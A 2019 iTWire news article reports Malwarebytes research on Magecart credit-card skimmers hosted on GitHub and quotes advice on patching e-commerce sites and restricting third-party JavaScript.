Security Market Segment LS
Monday, 29 April 2019 09:59

Magecart skimmers now being hosted on GitHub


Malicious attackers have used the GitHub code repository for hosting credit card skimmers which are known as Magecart, the security firm Malwarebytes says, adding that new e-commerce websites are being attacked every day.

In a blog post, researcher Jérôme Segura said in most cases, the code used for skimming — written in JavaScript and obfuscated — was hosted on servers controlled by the attackers themselves.

Most of these servers had domain names mimicking Magento, the e-commerce platform that is the most attacked.

Last year, British Airways was attacked with a variant of Magecart as was online retailer Newegg.

"However, as we sometimes see in other types of compromises, threat actors can also abuse the resources of legitimate providers, such as code repository GitHub, acquired by Microsoft last year," Segura said.

The latest skimmer found by the company was a hex-encoded piece of JavaScript uploaded to GitHub on 20 April by a user who had the moniker momo33333 – and had just opened an account with GitHub that very day.

Segura posted a number of images of the obfuscated JavaScript, noting that the attacker appeared to be fine-tuning the skimmer after testing.


The deobfuscated script shows the exfiltration domain (jquerylol[.]ru) where the stolen data will be sent. Courtesy Malwarebytes

He also posted an deobfuscated image of the script, where it was possible to see the domain to which data was being exfiltrated.

Segura said the compromised Magento sites would continue to be risk, even if the GitHub-hosted skimmer was taken down.

"Indeed, attackers can easily re-infect them in the same manner they initially injected the first one," he said.

"It is critical for e-commerce site owners to keep their CMS and its plugins up-to-date, as well as using secure authentication methods. Over the past year, we have identified thousands of sites that are hacked and posing a risk for online shoppers."

Commenting on the incident, Peter Blum, vice-president of Technology at Instart, a company that provides cloud services for application performance and security, said: "With the rapid rise of third-party JavaScript code used on websites, it's easier than ever for malicious third parties to gain access to sensitive information such as credit card numbers, address information and even login credentials.

"My advice for companies is to take a zero trust model with JavaScript on their sites, starting with a policy to block access by default to any sensitive information entered in Web forms and stored cookies.

"From there, you only allow a select set of vetted scripts (usually only your own) to access this sensitive data. And as a result, if this type of skimming code does get on your site, it simply can't access any sensitive information."


26-27 February 2020 | Hilton Brisbane

Connecting the region’s leading data analytics professionals to drive and inspire your future strategy

Leading the data analytics division has never been easy, but now the challenge is on to remain ahead of the competition and reap the massive rewards as a strategic executive.

Do you want to leverage data governance as an enabler?Are you working at driving AI/ML implementation?

Want to stay abreast of data privacy and AI ethics requirements? Are you working hard to push predictive analytics to the limits?

With so much to keep on top of in such a rapidly changing technology space, collaboration is key to success. You don't need to struggle alone, network and share your struggles as well as your tips for success at CDAO Brisbane.

Discover how your peers have tackled the very same issues you face daily. Network with over 140 of your peers and hear from the leading professionals in your industry. Leverage this community of data and analytics enthusiasts to advance your strategy to the next level.

Download the Agenda to find out more


Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.



Recent Comments